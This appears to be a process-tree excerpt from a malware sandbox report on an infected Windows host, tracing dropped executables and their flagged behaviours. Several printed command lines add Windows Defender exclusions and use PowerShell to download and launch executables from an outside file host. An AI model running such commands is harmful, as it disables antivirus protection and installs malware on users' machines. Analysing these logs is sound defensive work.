                                                                                                                                                                                          • C:\Users\Admin\Documents\ywOJQfiCxeeXZvYn59d6aJkZ.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\ywOJQfiCxeeXZvYn59d6aJkZ.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                            PID:6148
                                                                                                                                                                                          • C:\Users\Admin\Documents\NoZlHBp36QxGKgZ2CiLr95_E.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\NoZlHBp36QxGKgZ2CiLr95_E.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:5304
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:7680
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:7440
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:696
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:7184
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:8828
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:2324
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              PID:6192
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              PID:9076
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:696
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:8760
                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:8768
                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                            PID:8156
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                              PID:3848
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                PID:9292
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                  PID:9812
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                              PID:6580
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                PID:188
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:8328
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                  PID:8804
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                                    "{path}"
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                    PID:4968
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                                    "{path}"
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                      PID:4680
                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                        PID:4868
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\EOmGLA3KMTa1LFBze4flWaz2.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Documents\EOmGLA3KMTa1LFBze4flWaz2.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              PID:6900
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\EOmGLA3KMTa1LFBze4flWaz2.exe
                                                                                                                                                                                                                                C:\Users\Admin\Documents\EOmGLA3KMTa1LFBze4flWaz2.exe
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                  PID:7712
                                                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:200
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp7CDD_tmp.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\tmp7CDD_tmp.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:7600
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:7188
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:4596
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          cmd
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:4104
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                              findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                PID:7936
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                Esplorarne.exe.com i
                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                  PID:8936
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                    PID:8512
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                      PID:7936
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                        PID:8940
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                          PID:9196
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                            PID:6496
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                                                PID:8972
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                  PID:5016
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                    PID:6240
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                      PID:8656
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                        19⤵
                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                        PID:9132
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                          20⤵
                                                                                                                                                                                                                                                                            PID:8820
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                              21⤵
                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                              PID:8408
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                22⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                PID:3972
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                  23⤵
                                                                                                                                                                                                                                                                                    PID:5268
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                      24⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                      PID:8972
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                        25⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                        PID:4000
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                          26⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                          PID:7172
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                            27⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                            PID:432
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                              PID:2140
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                29⤵
                                                                                                                                                                                                                                                                                                  PID:5740
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                    30⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                    PID:8936
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                      31⤵
                                                                                                                                                                                                                                                                                                        PID:6120
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                          32⤵
                                                                                                                                                                                                                                                                                                            PID:2960
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                              33⤵
                                                                                                                                                                                                                                                                                                                PID:4476
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                  34⤵
                                                                                                                                                                                                                                                                                                                    PID:7192
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                      35⤵
                                                                                                                                                                                                                                                                                                                        PID:3272
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                          36⤵
                                                                                                                                                                                                                                                                                                                            PID:5592
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                              37⤵
                                                                                                                                                                                                                                                                                                                                PID:5320
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                  38⤵
                                                                                                                                                                                                                                                                                                                                    PID:9068
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                      39⤵
                                                                                                                                                                                                                                                                                                                                        PID:8888
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                            ping RJMQBVDN -n 30
                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                                                            PID:8664
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:4852
                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        PID:2796
                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                      PID:3244
                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:2172
                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:4964
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282276 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          PID:5316
                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                        PID:3404
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\7EXXmv2tduvr3lEb9L3Y0xEF.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\7EXXmv2tduvr3lEb9L3Y0xEF.exe"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:4128
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\JY1waZH0c7aOBKFiV_cOIiAK.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\JY1waZH0c7aOBKFiV_cOIiAK.exe"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  PID:4220
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 760
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:5504
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 816
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:6028
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 764
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:5348
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 820
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:6024
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 956
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:2472
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 992
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:152
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 1048
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:5436
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 1400
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:6928
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 1356
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:6032
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 1472
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:7052
